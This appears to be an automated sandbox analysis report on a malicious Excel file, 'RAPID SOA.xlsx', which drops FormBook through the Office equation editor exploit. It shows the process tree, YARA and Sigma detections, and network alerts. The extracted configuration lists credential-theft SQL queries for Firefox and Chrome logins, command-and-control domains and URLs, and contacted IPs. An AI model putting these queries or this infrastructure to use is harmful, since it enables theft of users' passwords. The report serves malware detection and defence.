Loading ...

Play interactive tourEdit tour

Analysis Report RAPID SOA.xlsx

Overview

General Information

Sample Name:RAPID SOA.xlsx
Analysis ID:344819
MD5:80e9c5fd1d11fa266b7263599c54a465
SHA1:c3d2ddda42a6e1915174b4c496b3da3bd3ad4b5e
SHA256:8cce72a111107f7a07477f7ef696e1edca5ec2ede9a7a4a3a3367f72544025f7
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 172 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2520 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2668 cmdline: 'C:\Users\Public\vbc.exe' MD5: A9AA5937E09501E97E40E0FCF97FAC55)
      • vbc.exe (PID: 2832 cmdline: C:\Users\Public\vbc.exe MD5: A9AA5937E09501E97E40E0FCF97FAC55)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • systray.exe (PID: 2340 cmdline: C:\Windows\SysWOW64\systray.exe MD5: DF6923839C6A8F776F0DA704C5F4CEA5)
            • cmd.exe (PID: 2028 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d54d", "CONFIG SIZE : 0xeb", "CONFIG OFFSET 0x1d64e", "URL SIZE : 31", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x40e95d07", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01471", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "jeiksaoeklea.com", "sagame-auto.net", "soloseriolavoro.com", "thecreatorsbook.com", "superskritch.com", "oroxequipment.com", "heart-of-art.online", "liwedfg.com", "fisherofsouls.com", "jota.xyz", "nehyam.com", "smart-contact-delivery.com", "hoom.guru", "dgryds.com", "thesoakcpd.com", "mishv.com", "rings-factory.info", "bero-craft-beers.com", "podcastnamegenerators.com", "856379813.xyz", "ruinfectious.com", "wdcsupport.com", "youngbrokeandeducated.com", "shpments75.com", "louisbmartinez100th.com", "shining.ink", "hkexpresswaterford.com", "quickcashoffersatl.com", "180cliniconline.com", "mainriskintl.com", "clinicadosorriso.com", "kuxueyunkeji.com", "smart-acumen.com", "maisonkerlann.com", "jewishposter.com", "xn--w52b77ujva.com", "antoniodevivo.com", "diversitypatriots.com", "tiotacos.company", "ventumgi.com", "ip-tv.online", "smithvilletexashistory.com", "amruta-varshini.com", "wildpositive.com", "alifezap.com", "nczjt.net", "palmsvillaswhitneyranch.com", "experiencemoretogether.com", "dewitfire.com", "scruffynotfluffy.online", "bazarsurtidorico.com", "dayscosmetics.com", "tpsvegas.com", "externalboard.com", "2125lynchmere.com", "agroplenty.com", "easterneuropemall.com", "whtoys888.com", "writehousepoint.com", "ppeaceandgloves.com", "sadtire.press", "jj3994.com", "smokenengines.com", "offplanprojects-re.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.bytecommunication.com/aky/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2c6de8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2c7062:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2f3408:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2f3682:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2d2b85:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2ff1a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2d2671:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2fec91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2d2c87:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x2ff2a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x2d2dff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x2ff41f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x2c7a7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x2f409a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x2d18ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x2fdf0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x2c8773:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x2f4d93:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x2d8827:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x304e47:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x2d982a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x2d5909:$sqlite3step: 68 34 1C 7B E1
    • 0x2d5a1c:$sqlite3step: 68 34 1C 7B E1
    • 0x301f29:$sqlite3step: 68 34 1C 7B E1
    • 0x30203c:$sqlite3step: 68 34 1C 7B E1
    • 0x2d5938:$sqlite3text: 68 38 2A 90 C5
    • 0x2d5a5d:$sqlite3text: 68 38 2A 90 C5
    • 0x301f58:$sqlite3text: 68 38 2A 90 C5
    • 0x30207d:$sqlite3text: 68 38 2A 90 C5
    • 0x2d594b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x2d5a73:$sqlite3blob: 68 53 D8 7F 8C
    • 0x301f6b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x302093:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2668
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.125.191.208, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2520, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2668
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2668
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2668

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d54d", "CONFIG SIZE : 0xeb", "CONFIG OFFSET 0x1d64e", "URL SIZE : 31", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x40e95d07", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01471", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: RAPID SOA.xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.systray.exe.8b0000.0.unpackAvira: Label: TR/Dropper.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: systray.pdbB source: vbc.exe, 00000005.00000002.2201164728.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: systray.pdb source: vbc.exe, 00000005.00000002.2201164728.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, systray.exe
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 004ECA17h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: chise2neversndywalka.dns.army
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.125.191.208:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.125.191.208:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 184.168.131.241:80
